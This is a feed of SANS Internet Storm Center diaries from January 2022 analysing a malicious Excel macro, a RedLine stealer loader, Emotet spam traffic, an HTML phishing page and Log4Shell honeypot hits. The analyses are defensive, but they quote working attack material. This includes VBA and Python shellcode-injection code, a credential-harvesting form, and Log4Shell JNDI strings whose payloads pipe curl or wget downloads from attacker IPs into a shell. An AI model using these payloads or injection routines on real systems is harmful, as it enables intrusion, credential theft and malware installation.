SANS

Subscribe to SANS hírcsatorna SANS
SANS Internet Storm Center - Cooperative Cyber Security Monitor
Frissítve: 1 óra 33 perc
2022. január 22.

Mixed VBA & Excel4 Macro In a Targeted Excel Sheet, (Sat, Jan 22nd)

Yesterday, Nick, one of our readers, shared with us a very interesting Excel sheet and asked us to check if it was malicious. Guess what? Of course, it was and he accepted to be mentioned in a diary. Thanks to him! This time, we also have the context and how the file was used. It was delivered to the victim and this person was called beforehand to make it more confident with the file. A perfect example of social engineering attack. The Excel sheet contains details of a real-estate project. The Excel sheet is called "Penthouse_8271.xls" and, once opened, you see this:

The real-estate agency mentioned in the sheet exists and is established in Austria. When I receive a suspicious file like this one, I'm always starting with automated tools to speed up the analysis but this time, it did not work. To analyze VBA macros, one of my favorite tools is Vipermonkey but it almost crashed my REMnux environment, using a lot of memory. Let's revert to manual analysis. Some quick findings: The macro is heavily obfuscated, the code is populated with a lot of empty functions and comments. The macro does have the classic AutoOpen() function to automatically execute it. But we have these functions:

Sub info() Tabelle1.Visible = True Tabelle1.Activate boop End Sub Sub beschreibung() Tabelle2.Visible = True Tabelle2.Activate boop End Sub Sub grundriss() Tabelle3.Visible = True Tabelle3.Activate boop End Sub Sub haftung() Tabelle5.Visible = True Tabelle5.Activate boop End Sub

You see that the function names correspond to the button seen in the picture above. The malicious code is located in boop() and will be triggered when the user clicks on a button. Let's click on "Penthouse Overview":

Note: this is a nice trick to defeat most of the Sandboxes because a user's interaction is required.

Legit information is displayed and the macro executed. Let's have a look at the code:

Sub boop() SuperintendAuthors = Array() SuperintendAuthors = LongPleasures(SuperintendAuthors, ObtainedAncient("140000888e050094095b80e037e3000ac400f32308f044900eb00046500009e3f0bc0f40090e2b4290808e27008feea" & _ "0b00040090e010009c2e58bc8213e910ac790c20051a819c21f150b01e465b126ec9b9e5ee08050ab40700bcc0c00803c118001d90fcf90ff8ff5bf" & _ "ee11f51229d88f1e51fb121c8c926120c90e0c0a200fuopurr0wdbhjdb")) SuperintendAuthors = LongPleasures(SuperintendAuthors, ObtainedAncient("148e5e150510c90080d80f0f00ff8ff50200492e08059009a007ec9000ce94000204c0be90b1e8059e0c285e08353d260800914110" & _ "ebbc91ec0c4108b1e3e0e85080090b00979040fea180fcaebcc0509c1d0109000ee900002a" & _ "d6000835e30f747503217027b0a8014c11f126188044708fa174164103816408510964109f001" & _ "lwppbij1cjpchuk")) SuperintendAuthors = LongPleasures(SuperintendAuthors, ObtainedAncient("14e010b96ca0090b0bffb5d03ea1f57f0e810a5690e5006ff3ccb77ffffc1fcc7e0c00619191001c6000009ec8530eb84000cc50071b" & _ "080588bc470055ceb5598818829d181e20c8909ec8700898b0008c9028ebb872ee0f764" & _ "b51e0829305ba3baee800b50f084103a0b00017c5010fec0d1ca31af1b8c04f0d0ebf3530b1c85tcquttu4jpgotwt"))

Pretty nice obfuscation! Multiple functions are called to decode all strings and finally, the following one is called. It reveals the technique used:

Function SpecialLeaving(OverDesire As String) SpecialLeaving = ExecuteExcel4Macro(OverDesire) End Function

The ExecuteExcel4Macro() is a VBA function to execute an Excel4 function[1]. Because we don't have an Excel4 macro split in cells, the classic deobfuscation tools won't work. To spread up the analysis, I added the following code to the macro:

Sub DumpExcel4(buffer as String) Dim outout As String output = "C:\temp\debug.txt" Open output For Append As #1 Write #1, buffer Close #1 End Sub Function SpecialLeaving(OverDesire As String)   DumpExcel4(OverDesire) SpecialLeaving = ExecuteExcel4Macro(OverDesire) End Function

This dumped all Excel4 functions into a flat-file. Once the macro has been executed in my lab, I got a nice debug.txt file:

"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",4096,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",8192,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",12288,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",16384,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",20480,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",24576,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",28672,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",32768,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",36864,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",40960,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",45056,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",49152,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",53248,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",57344,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",61440,15992,12288,64)" "CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",65536,15992,12288,64)" "CALL(""ntdll"",""memset"",""JJJJ"",65536,232, 1)" "CALL(""ntdll"",""memset"",""JJJJ"",65537,0, 1)" "CALL(""ntdll"",""memset"",""JJJJ"",65538,0, 1)" "CALL(""ntdll"",""memset"",""JJJJ"",65539,0, 1)" "CALL(""ntdll"",""memset"",""JJJJ"",65540,0, 1)" "CALL(""ntdll"",""memset"",""JJJJ"",65541,89, 1)" "CALL(""ntdll"",""memset"",""JJJJ"",65542,72, 1)" "CALL(""ntdll"",""memset"",""JJJJ"",65543,131, 1)" "CALL(""ntdll"",""memset"",""JJJJ"",65544,233, 1)"

We see that some memory is allocated. The last parameter of VirtualAlloc() is 64 (0x40) which means that memory is created with the PAGE_EXECUTE_READWRITE flag (to contain executable code). Then, the payload is moved into memory byte per byte with a very long series of memset(). Finally, the payload is executed on the last line:

"CALL(""Kernel32"",""CreateThread"",""JJJJJJB"",0,0,65536,0,0,0)"

The macro dumped 16009 lines in the file! Now, we can extract the payload:

remnux@remnux:/MalwareZoo/20220121$ grep memset debug.txt | awk -F ',' '{print $5}'|sets.py join ","

The result is a suite of characters:

232,0,0,0,0,89,72,131,233,5,186,120,62,0,0,51,192,64,144,15,132,79,36,0,0,233,107,5,0,0,252,233,63,...

The fastest way to decode this is to use Cyberchef with a simple recipe "From Decimal". I did a quick analysis of the shellcode. It connects to acrobatrelay[.]com but I don't have all the features at this time, still under investigation...

[1] https://docs.microsoft.com/en-us/office/vba/api/excel.application.executeexcel4macro

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 21.

Obscure Wininet.dll Feature? , (Fri, Jan 21st)

The Internet Storm Center relies on a group of Handlers[1] who are volunteers and offer some free time to the community besides our daily job. Sometimes, we share information between us about an incident or a problem that we are facing and ask for help. Indeed, why not request some help from fellow Handlers with broad experience? Yesterday, Bojan was involved in an incident with a customer and came back to us with this question:

"Did you already see this long list of domain names listed in C:\Windows\SysWOW64\wininet.dll on Windows 10?"

$ strings -e l wininet.dll | egrep 'hr\.' hr.com.eujuicers hr.global hr.prvikvadrat hr.ak-varazdin hr.stin hr.pizzeriaamadeus hr.silvergoldbull hr.maskice hr.perzeidi hr.udruga-point hr.tokic hr.advance hr.com.airbnb hr.svijet-medija hr.autoskole hr.kub hr.slink hr.com.cevo hr.mall hr.autoskola hr.blablacar hr.abpis hr.audion hr.from.brunohenc hr.orkestar-krizevci ...

Immediately, other handlers started to check in their own labs and reported the same finding. Bojan, based in Croatia searched for the ".hr" TLD. I searched for ".be":

$ strings -e l wininet.dll |grep "be\." be.slimmerbouwen be.fanjoe be.buderus-family be.loanstreet be.de-spil be.maximdeboiserie be.intux be.lafosseobservatoire be.rubendv be.rigartmichael be.eliott be.pgtb be.kgm-irm be.psncardplus be.carroarmato0 be.poollicht be.mths be.nord-sud be.centralpoint ...

Guy did the same test and reported that his copy of the DLL has 47881 Unicode strings! We tested several Windows 10 systems and all of them had the same kind of strings in wininet.dll, so Bojan's one was not compromised.

What is this DLL? wininet or "Win32 Internet Extensions" is used to allow programs to interact with the Internet. It provides well-known API calls like:

InternetOpenURL InternetReadFile HTTPOpenRequest

You can imagine that it's being used by a lot of processes and applications. Note that you can list which processes loaded a specific DLL with the following command:

C:\Users\REM>tasklist /m wininet.dll Image Name PID Modules ========================= ======== ============================================ taskhostw.exe 4576 wininet.dll explorer.exe 4964 WININET.dll ShellExperienceHost.exe 4004 WININET.dll SearchUI.exe 4368 WININET.dll RuntimeBroker.exe 5192 WININET.dll Fiddler.exe 7048 WININET.dll WinStore.App.exe 2036 WININET.dll RuntimeBroker.exe 64 WININET.dll

Let's come back to the list of suspicious domains. What did we find? There are domains from many different TLDs. Some belong to small companies, others belong to big players within different domains of activity, and no relation between them. What we found is that many of them appear to be preloaded HSTS domains. The Chrome browser does this and has a hardcoded list of domains sites as being HTTPS only[3]. Does Microsoft implement the same within wininet.dll?

Our next step was to start debugging the DLL to learn more about these domains. They are passed to a function called IsHostInBlocklist(), which is in turn called from two separate locations CServerInfo::DetermineStrongCryptoState(), and CServerInfo::DetermineFalseStartState().

This function IsHostInBlockList() is used by interesting API calls but through a deep list of functions:

At this time, we are still investigating and trying to understand the purpose of those hardcoded domains and functions. They are listed in the DLL symbols[4] but no documentation was found. If you have more information, or if you are working for Microsoft, please share your findings with us!

[1] https://isc.sans.edu/handler_list.html
[2] https://docs.microsoft.com/en-us/cpp/mfc/win32-internet-extensions-wininet?view=msvc-170
[3] https://hstspreload.org/
[4] https://lise.pnfsoftware.com/winpdb/8B274E3115F9D58AB6E0DCF4CA336C86E4E1866AE7E801860B5F2876FAE48E24-wininet.html

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 21.

ISC Stormcast For Friday, January 21st, 2022 https://isc.sans.edu/podcastdetail.html?id=7846, (Fri, Jan 21st)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 20.

RedLine Stealer Delivered Through FTP, (Thu, Jan 20th)

Here is a piece of malicious Python script that injects a RedLine[1] stealer into its own process. Process injection is a common attacker’s technique these days (for a long time already). The difference, in this case, is that the payload is delivered through FTP! It’s pretty unusual because FTP is today less and less used for multiple reasons (lack of encryption by default, complex to filter with those passive/active modes). Support for FTP has even been disabled by default in Chrome starting with version 95! But FTP remains a common protocol in the IoT/Linux landscape with malware families like Mirai. My honeypots still collect a lot of Mirai samples on FTP servers. I don't understand why the attacker chose this protocol because, in most corporate environments, FTP is not allowed by default (and should definitely not be!).

The Python script contains the credentials and FTP server IP address. When you connect manually, you can list a bunch of different payloads but the one used in this case is 001.enc.

remnux@remnux:/MalwareZoo/20220119$ ftp x.x.x.x Connected to x.x.x.x. 220-FileZilla Server 0.9.60 beta 220-written by Tim Kosse (tim.kosse@filezilla-project.org) 220 Please visit https://filezilla-project.org/ Name (62.109.1.213:root): launcher 331 Password required for launcher Password: 230 Logged on Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||58066|) 150 Opening data channel for directory listing of "/" -r--r--r-- 1 ftp ftp 228352 Jan 17 21:25 001.ENC -r--r--r-- 1 ftp ftp 228352 Jan 17 21:25 002.ENC -r--r--r-- 1 ftp ftp 879104 Jan 17 09:26 11.ENC -r--r--r-- 1 ftp ftp 675840 Aug 14 2021 1650.ENC -r--r--r-- 1 ftp ftp 675328 Dec 11 2021 167.ENC -r--r--r-- 1 ftp ftp 675328 Jan 02 13:01 1680.ENC 226 Successfully transferred "/" ftp>

The payload is encrypted and the following function does the job to decrypt the PE file:

def encode_data(data): key = b"JHGIEKC6U" S = bytearray(range(256)) j = 0 out = bytearray() for i in range(256): j = (j + S[i] + key[i % len(key)]) % 256 S[i] , S[j] = S[j] , S[i] i = j = 0 for char in data: i = ( i + 1 ) % 256 j = ( j + S[i] ) % 256 S[i] , S[j] = S[j] , S[i] out.append(char ^ S[(S[i] + S[j]) % 256]) return(bytes(out))

Like I said to my students when I'm teaching FOR610, when you are investigating an incident, the way the payload was encrypted/encoded is less relevant. The payload in itself is important. To extract the PE file, I just wrote a quick Python script that replicates this function and dumps the payload into a file.

The decrypted payload SHA256 is 0eeb332efa3c20c2f3d85d07d844ba6150bdee3c1eade52f0f2449c3d2727334 and is unknown on VT at this time.

The script also has a hex-encoded shellcode. Why do we have a shellcode and another payload? Here is the function used to inject the code:

def runpe(peimage): filepathenv = "%ProgramFiles%\\Internet Explorer\\iexplore.exe" filepath = os.path.expandvars(filepathenv) ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p p = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(sc)),   ctypes.c_int(0x3000), ctypes.c_int(0x40)) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(p), sc, ctypes.c_int(len(sc))) q = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(peimage)),   ctypes.c_int(0x3000), ctypes.c_int(0x40)) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(q), peimage, ctypes.c_int(len(peimage))) run = ctypes.cast(p, ctypes.WINFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p)) run(filepath.encode('utf8')+b'\x00', q)

You see that two calls to VirtualAlloc() are performed. The first one is used to load the shellcode into memory and the second to load the payload (RedLine itself). The most interesting line is the one with the ctypes.cast(). This function allows casting the shellcode to act as a function pointer. Once completed, the shellcode can be called like any standard Python function:

run(filepath.encode('utf8')+b'\x00', q)

Through the shellcode, Python will execute RedLine that has been injected in memory before. My sample tried to connect to the following C2 but it was offline (78[.]24[.]222[.]162:37819).

The initial Python script (SHA256:e6d6451b82a03a3199770c490907ef01c401cc44826162a97d0f22aa9c122619) has a VT score of 14/58[2].

[1] https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
[2] https://www.virustotal.com/gui/file/e6d6451b82a03a3199770c490907ef01c401cc44826162a97d0f22aa9c122619

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 20.

ISC Stormcast For Thursday, January 20th, 2022 https://isc.sans.edu/podcastdetail.html?id=7844, (Thu, Jan 20th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 19.

0.0.0.0 in Emotet Spambot Traffic, (Wed, Jan 19th)

Introduction

Emotet often uses information from emails and address books stolen from infected Windows hosts.  Malicious spam (malspam) from Emotet spoofs legitimate senders to trick potential victims into running malicious files.

Additionally, Emotet uses IP address 0.0.0.0 in spambot traffic, possibly attempting to hide the actual IP address of an Emotet-infected host.

This ISC diary reviews the spoofed 0.0.0.0 address used in a recent Emotet infection from Tuesday 2022-01-18.


Shown above:  0.0.0.0 in DNS queries from an Emotet-infected host.

Scenes from an infection

Both Emotet botnets (dubbed by researchers as "epoch 4" and "epoch 5") resumed activity after the recent holiday season, and malicious spam started approximately one week ago on Tuesday 2022-01-11.

Most Windows hosts I've infected with Emotet in my lab will start spamming within an hour or less after the initial infection.  Refer to the images below for activity from a recent Emotet infection on 2022-01-18.


Shown above:  Screenshot from malspam pushing Emotet on Tuesday 2022-01-18.


Shown above:  Web page from link in the malspam.


Shown above:  Example of downloaded Excel spreadsheet for Emotet.

Enable macros in a downloaded spreadsheet, and they will infect a vulnerable Windows host.  This is standard operating procedure for Emotet.


Shown above:  Traffic from an infection filtered in Wireshark.


Shown above:  Spambot activity started approximately 27 minutes after the initial infection.

Emotet spambot traffic using 0.0.0.0

Right as the spambot activity starts, the following DNS queries are made using domains related to spam filtering:

  • 0.0.0.0.spam.abuse.ch
  • 0.0.0.0.b.barracudacentral.org
  • 0.0.0.0.bl.mailspike.net
  • 0.0.0.0.spam.dnsbl.sorbs.net
  • 0.0.0.0.zen.spamhaus.org

Similar DNS queries, but without the 0.0.0.0, are generated during Trickbot infections.  However, Trickbot uses the infected host's public IP address data in the DNS query.  Here is an example from analysis of a Trickbot sample (scroll down to the "Domains" list).


Shown above:  0.0.0.0-related DNS queries from an Emotet-infected host.

In addition to DNS queries, Emotet uses 0.0.0.0 during SMTP communications.  This happens whenever an Emotet-infected host tries sending malspam to a targeted mailserver.  The SMTP command is EHLO [0.0.0.0].


Shown above:  SMTP traffic using EHLO [0.0.0.0].

This attempt does not hide the actual IP address of an Emotet-infected host, because it still appears elsewhere in the SMTP traffic (blurred in the above image, for example).  But 0.0.0.0 can be an indicator of emails pushing Emotet or other malware.


Shown above:  Example of Emotet malspam with 0.0.0.0 in the email headers.

Final words

While 0.0.0.0 is an indicator for Emotet or other malware, you can find up-to-date indicators for Emotet malware samples, URLs, and C2 IP addresses at:

---

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 19.

ISC Stormcast For Wednesday, January 19th, 2022 https://isc.sans.edu/podcastdetail.html?id=7842, (Wed, Jan 19th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 18.

Phishing e-mail with...an advertisement?, (Tue, Jan 18th)

Authors of phishing and malspam messages like to use various techniques to make their creations appear as legitimate as possible in the eyes of the recipients. To this end, they often try to make their messages look like reports generated by security tools[1], responses to previous communication initiated by the recipient[2], or instructions from someone at the recipients organization[3], just to name a few. Most such techniques have been with us for a long time, however, last week I came across one that I don’t believe I’ve ever seen before – inclusion of what may be thought of as an advertisement in the body of the message.

Although it may sound strange, the inclusion did make at least some sort of sense. The message was supposed to look like an information about a new “fax” sent by a Xerox scanner, and its footer – which was slightly reminiscent of ads displayed by Google in search results – included links and text related to Xerox solutions.

One can only guess at whether this addition makes the message more or less believable to a regular user, but it is certainly unusual… However, it wasn’t the only slightly atypical thing about the e-mail.

As you may see in the image above, the message carried an HTM attachment. This contained an entire fake login page for Office 365 (it only loaded the O365 logo from an external site).

This technique, in which phishers include an entire fake login page in an attachment, which only initiates communication with external infrastructure when a victim attempts to click a log in button has been with us for a while now[4], and certainly has its advantages from the point of view of the attackers. This time, however, there was a slight twist to it.

Probably in order to try to bypass basic security scans on e-mail gateways, the authors of the page attempted to include the HTML form (with the URL to which the credentials supplied by the victim should be sent) in the code of the page dynamically, using JavaScript functions “unescape” and “document.write” – i.e., the JavaScript was supposed to decode a string that contained the HTML code of the form and then include it in the body of the page. This approach of delivering some of the more “problematic” parts of HTML content encoded, and only decoding them using JavaScript when the web page is loaded by a browser is used quite often by threat actors, and can potentially be somewhat effective.

However, in this case, it seems that the authors of this specific fake login page either didn’t understand how the JavaScript they included was supposed to work, or they simply forgot to do a final check before sending the phishing out. Whatever the reason was, as the following code excerpt shows, it seems that they forgot to encode the relevant part of their HTML code, therefore making the entire inclusion of JavaScript decoder meaningless and leaving the form data (including the URL of the credential-gathering site) easily readable to even the simplest security tool…

<center><img height="100" src="https://www.smc.edu/administration/information-technology/student-email/images/office-365-logo.png?itok=w_rJbRrF" /> <p><font color="Black" face="Trebuchet MS" size="2"><strong>You have a pending document for download</strong><br /> DOC SIZE (1.0MB) </font></p> <script language=javascript>document.write(unescape('<form class="modal-content animate" method="post" action="hxxps://metsbadseed[.]com/ctox/quotee.php">'))</script> <div class="container"> <center> <p><font color="black" face="Trebuchet MS" size="2">&nbsp;Prove You are not a Robot and&nbsp;</font><span style="color: rgb(0, 0, 0); font-size: small; text-align: -webkit-center;">To continue sign in your Microsoft email to Confirm Identity</span><br /> <input id="fname" name="login" placeholder="Enter Email Address" readonly="readonly" required="" type="email" value="sales@[redacted]" /><br /> <input autofocus="" id="fname" name="passwd" placeholder="Enter Email Password" required="" type="password" /><br /> <button type="submit">CONTINUE</button></p> </center>

Although – given what we just mentioned – one can hardly call the phishing attempt sophisticated, the unusual inclusion of advertisement-like content in the body of the e-mail did, at least, make it somewhat interesting... And, hopefully, the slight failure on the part of its senders made it less likely to actually make it to recipients’ inboxes and cause any harm.

[1] https://isc.sans.edu/forums/diary/Phishing+101+why+depend+on+one+suspicious+message+subject+when+you+can+use+many/27842/
[2] https://isc.sans.edu/forums/diary/Qakbot+in+a+response+to+Full+Disclosure+post/27130/
[3] https://isc.sans.edu/forums/diary/BazarLoader+phishing+lures+plan+a+Halloween+party+get+a+bonus+and+be+fired+in+the+same+afternoon/26710/
[4] https://isc.sans.edu/forums/diary/Phishing+with+a+selfcontained+credentialsstealing+webpage/25580/

-----------
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 18.

ISC Stormcast For Tuesday, January 18th, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=7840, (Tue, Jan 18th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 17.

Log4Shell Attacks Getting "Smarter", (Mon, Jan 17th)

Ever since news of the Log4Shell vulnerability broke, we saw a stream of attacks attempting to exploit this vulnerability in log4j (%%cve:2021-44228%%).

Initial attempts where rather "blunt", and attempted to insert the JNDI exploit string into various fields without much concern how and where the string may be logged. More recently, we did some however some more specific exploits targeting specific software configurations. Most notably, exploit have been released for Unifi's network controller and VMWare.

Today for example, we saw some exploit strings that may be targeting Tomcat configurations:

/$%7Bjndi:ldap://ldap://62.182.80.168:13899/o=tomcat%7D/x=%24%7Bjndi%3Aldap%3A%2F%2F142.44.203.85%3A1389%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCA3Mi40Ni41Mi4xMzUvbWFkLnNoIHwgYmFzaA%3D%3D%7D

This decodes to:

/${jndi:ldap://ldap://62.182.80.168:13899/o=tomcat}/x=${jndi:ldap://142.44.203.85:1389/TomcatBypass/Command/Base64/Y3VybCA3Mi40Ni41Mi4xMzUvbWFkLnNoIHwgYmFzaA==}

With the Base64 part decoding to: curl 72.46.52.135/mad.sh . This will lead, after many redirects and the like, to a good old xmrig miner. Maybe something for a later day as there are some interesting tidbits in the various shell scripts downloaded.

A second, similar attempt was found in about two dozens of our honeypots:

/?test=t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyB

The URL retrieved by this attempt is no longer available, but given the similar method, chances are it is yet another crypto minder.

A few things to look for:

  • The first attempt is erasing log lines that contain this IP address: %%ip:107.191.63.34%%
  • It creates a /tmp/.shanbe directory
  • connects to a mining pool at %%ip:207.38.87.6%% (port 3333)
  • Downloads additional code from %%ip:41.157.42.239%% .

But then again, if you need IoCs like this to detect crypto miners: Reassess what kind of monitoring you do on more basic parameters like CPU load and rogue processes running on systems.

The news around log4shell has gotten quiet, but it isn't over yet. Attacks keep evolving and do not consider this a non-event if none of the initial "pray and spray" attacks affected you.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 17.

ISC Stormcast For Monday, January 17th, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=7838, (Mon, Jan 17th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 16.

10 Most Popular Targeted Ports in the Past 3 Weeks, (Sun, Jan 16th)

A review of all inbound connection over the past 3 weeks against my honeypot shows the top 2 targeted services were no surprise; a large amount of SSH (22, 2222) activity followed by Telnet (23) which Shodan still identifies over 2.7M hosts exposed to the Internet.

I previous did a diary [5,6] comparing SSH ports & banners as well as Telnet and RDP [7] on which the type of activity being logged hasn't really changed over time. One port that I was surprised to see as part of my top 5 was 6379, "Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache, and message broker."[8

Indicators

218.92.0.202 (12,081)
159.223.46.162 (11,814)
218.92.0.203 (10,138)
185.36.81.60 (4,554)
213.100.222.21 (1,867)
92.255.85.135 (1,550)
161.35.77.239 (1,499)
92.255.85.237 (1,479)
185.161.70.44 (1,238)
128.199.116.10 (1,202)

[1] https://www.shodan.io/search?query=port:23
[2] https://www.shodan.io/search?query=port:22
[3] https://www.shodan.io/search?query=port:2222
[4] https://www.shodan.io/search?query=port:6379
[5] https://isc.sans.edu/diary/24724
[6] https://isc.sans.edu/diary/23201
[7] https://isc.sans.edu/diary/26492
[8] https://redis.io/topics/introduction

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 14.

Use of Alternate Data Streams in Research Scans for index.jsp., (Fri, Jan 14th)

Our network of web application honeypots delivered some odd new URLs in the last 24 hrs:

/index.jsp::$DATA
/jsp/index.jsp::$DATA
/cgi-bin/index.jsp::$DATA
/cgi-bin/jsp/index.jsp::$DATA
/demo/../index.jsp::$DATA
/demo/../jsp/index.jsp::$DATA
/scripts/index.jsp::$DATA
/scripts/jsp/index.jsp::$DATA

I am not 100% sure what these scans are after, but my best guess right now is that they are attempting to bypass filters using NTFS alternate data streams.

The Windows NTFS file system includes the ability to connect to alternate data streams. This has been documented in the past as a technique to hide data or to bypass URL filters [1][2].

In this case, the scans originate from %%ip:64.39.106.87%% , an IP associated with vulnerability scanning company Qualys. It appears to be hunting for index.jsp, a default for Java applications. Inside the cgi-bin or scripts directory, it may very well lead to code execution and may be protected by a WAF that the attacker attempts to bypass. I assume that right now, this is likely just a Qualys research project, but a good reminder to double-check your URL filters 

Any other ideas? Let me know.

[1] https://owasp.org/www-community/attacks/Windows_alternate_data_stream
[2] https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 14.

ISC Stormcast For Friday, January 14th, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=7836, (Fri, Jan 14th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 13.

ISC Stormcast For Thursday, January 13th, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=7834, (Thu, Jan 13th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 12.

A Quick CVE-2022-21907 FAQ (work in progress), (Wed, Jan 12th)

1 - When will an exploit be available?

Who knows. Microsoft rates the exploitability as "Exploitation More Likely". I suggest you patch this week.

2 - Which versions are affected?

Microsoft's advisory is a bit oddly worded. But at this point, my best read of it is: The vulnerable code was introduced in Windows Server 2019 and Windows 10 version 1809. But these versions of Windows had a registry key set by default disabling the feature. All later versions are vulnerable "out of the box". For Windows Server 2019 and Windows 10 Version 1809, the "HKLM:\System\CurrentControlSet\Services\HTTP\Parameter\EnableTrailerSupport" is set to 0 by default disabling trailers. You can check this registry value in Powershell (thanks Rob)l: 

Get-ItemProperty  "HKLM:\System\CurrentControlSet\Services\HTTP\Parameters" | Select-Object EnableTrailerSupport

3 - Am I vulnerable if I do not have IIS enabled?

Possibly. This is NOT an IIS vulnerability, but a vulnerability in http.sys. http.sys is probably best described as the core HTTP engine inside IIS. But other software using http.sys and possibly exposing the vulnerability: WinRM (Windows Remote Management), WSDAPI (Web Services for Devices) for example expose http.sys. For a quick list of processes using http.sys, try:

netsh http show servicestate

4 - Does a web application Firewall help?

Likely yes. You could start (at your own risk) to just block requests with trailers. Maybe log them first to see if you see legitimate uses (let us know what uses them and how). For details, ask your web app firewall vendor.

5 - Was there a similar severe vulnerability in the past?

In 2015, we had a similar fire drill for CVE-2015-1635 (MS15-34). Maybe you kept notes? They will come in handy now. This Range header vulnerability never amounted to much.

6 - What are these Trailers about anyway?

Trailers are defined in RFC7230. They only make sense if "Transfer-Encoding: chunked" is used. With chunked encoding, the body of a request or response is transmitted in small chunks. Each chunk is preceded by a length in bytes. The idea behind this is that you may not know as you start sending a message how long it will be. In addition, chunked encoding does allow the sender to delay sending headers until the body is sent. These become "trailers". Here is a quick sample request:

POST / HTTP/1.1
Host: testing
Content-Type: text/plain
Transfer-Encoding: chunked
Trailer: X-Test

3
ABC
0
X-Test: 123

The RFC states that "the sender SHOULD generate a Trailer header" suggesting it is not mandatory. This may make filtering more difficult if an exploit does not use a Trailer header (again: I am speculating what an exploit may look like. But having a trailer without a corresponding trailer header may cause some confusion).

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 12.

ISC Stormcast For Wednesday, January 12th, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=7832, (Wed, Jan 12th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. január 11.

Microsoft Patch Tuesday - January 2022 , (Tue, Jan 11th)

